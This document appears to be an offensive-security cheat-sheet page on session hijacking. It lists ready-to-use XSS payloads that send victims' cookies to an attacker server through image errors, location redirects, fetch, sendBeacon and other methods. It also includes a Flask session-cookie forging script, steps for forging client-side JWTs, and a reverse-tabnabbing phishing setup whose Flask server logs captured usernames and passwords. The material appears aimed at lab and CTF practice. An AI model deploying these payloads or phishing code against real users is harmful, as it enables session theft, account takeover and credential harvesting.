Page cover
Edit

Session Hijacking

Client-Side JWT Attack

If there are no cookies being generated before register or login is quite possible that the authorization process in being handled Clint-Side

Enumeration

  1. Go to WebDev Browser and look within the lib folder to find the file relate to JWT, normally is called jwt.js or jwt.ts

  2. Look for the JWT_SECRET and the signing methods

  3. Use jwt.io or JWT Editor extension from Burp Suite to craft a new token signed with the secret and give it the admin role.

Forge Flask Session Cookie

If you got the SECRET_KEY and the session data you may be able to forge a malicious cookie

from flask import Flask
from flask.sessions import SecureCookieSessionInterface
import hashlib

app = Flask(__name__)
app.secret_key = '948bc3cddc2fc42fcc5bb230b17ae23f0181ee62d0502d9d069af9099406c5d9'

# Create a malicious session
session_data = {
    'user': 'admin',
    'role': 'administrator',
    'is_admin': True
}

# Generate the session cookie
session_interface = SecureCookieSessionInterface()
session_cookie = session_interface.get_signing_serializer(app).dumps(session_data)
print(session_cookie)
Stealing Cookies via XSS

Error-Based Cookie Stealing

  • Trigger & manipulate Error Events

Basic image error trigger
<img src=x onerror=this.src="http://<YOUR_SERVER_IP>/?c="+document.cookie>
Using document.location
<img src=1 onerror="document.location='http://<YOUR_SERVER_IP>/'+ document.cookie">
Redirect
<img src=x onerror="location.href='http://<YOUR_SERVER_IP>/?c='+ document.cookie">
// Some code

Image-Based Cookie Stealing

Image object via script
<script>new Image().src="http://<IP>/?c="+encodeURI(document.cookie);</script>
Variable assignment method
<script>var i=new Image(); i.src="<YOUR_SERVER_IP>/?c="+document.cookie;</script>

Location-Based Cookie Stealing

Basic location redirect
<script>location.href = 'http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie</script>
Alternative location syntax
<script>location = 'http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie</script>
Document location method
<script>document.location = 'http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie</script>
Document location method + Redirect
<script>document.location.href = 'http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie</script>
Window location method
<script>window.location.assign('http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie)</script>
Window location method Dynamically
<script>window['location']['assign']('http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie)</script>
Window location method + Redirect
<script>window['location']['href']('http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie)</script>
String concatenation methods (dynamically join the URL and cookies to redirect)
<script>document.location=["http://<YOUR_SERVER_IP>?c",document.cookie].join()</script>
Location + redirect with concatenation of cookies
<script>window.location="https://<SERVER_IP>/?c=".concat(document.cookie)</script>

Advanced Cookie Stealing Methods

Audio object method
<script>new Audio().src="http://<IP>/?c="+escape(document.cookie);</script>
Document write method
<script>document.write('<img src="http://<YOUR_SERVER_IP>?c='+document.cookie+'" />')</script>
XMLHttpRequest method
<script>var xhttp=new XMLHttpRequest();xhttp.open("GET", "http://<SERVER_IP>/?c="%2Bdocument.cookie, true);xhttp.send();</script>
Fetch API method to avoid response handling:
<script>fetch('https://YOUR-SUBDOMAIN-HERE.burpcollaborator.net', {method: 'POST', mode: 'no-cors', body:document.cookie});</script>
SendBeacon API (stealthier)
<script>navigator.sendBeacon('https://ssrftest.com/x/AAAAA',document.cookie)</script>

DOM-Stored Cookie Extraction

Extract cookies stored in DOM elements
window.addEventListener('DOMContentLoaded', function(e) {
    window.location = "http://10.10.16.8:4444/?tokyo=" + encodeURI(document.getElementsByName("cookie")[0].value)
})
Reverse Tabnabbing

Documentation and original Writeup

If the link uses target="_blank" and doesn’t include rel="noopener" or rel="noreferrer", the new tab gets access to the original page via the window.opener object.

Vulnerable link
<a href="https://attacker-site.com" target="_blank">View article</a>
On the attacker site 
window.opener.location = 'https://phishing-site.com/login';

Craft the phishing attack

Set up a Flask web server:
from flask import Flask, request, render_template
app = Flask(__name__)
@app.route('/writeup.html', methods=['GET'])
def writeup():
return render_template('writeup.html')
@app.route('/accounts/login/', methods=['GET','POST'])
def login():
if request.method == "POST":
username = request.form.get('login')
password = request.form.get('password')
print("Got username and password: {}:{}".format(username,password))
return render_template('login.html')
else:
return render_template('login.html')
app.run(host="10.10.14.172",port=8000)
Altered the .html file to redirect to own version of login.html
<!doctype html>
<html>
Example Writeup
<script>
if (window.opener)
window.opener.parent.location.replace('http://10.10.14.172/accounts/login/');
if (window.parent != window)
window.parent.location.replace('http://10.10.14.172/accounts/login/');
</script>
</html>
Clone the login page for the platform:
wget http://developer.htb/accounts/login/ -O templates/login.html

  • Change the CSS and JS imports to point to a more credible site.

  • Just lunch the attack submitting the .html file

PreviousPrototype PollutionNextTemplate Manipulation

Last updated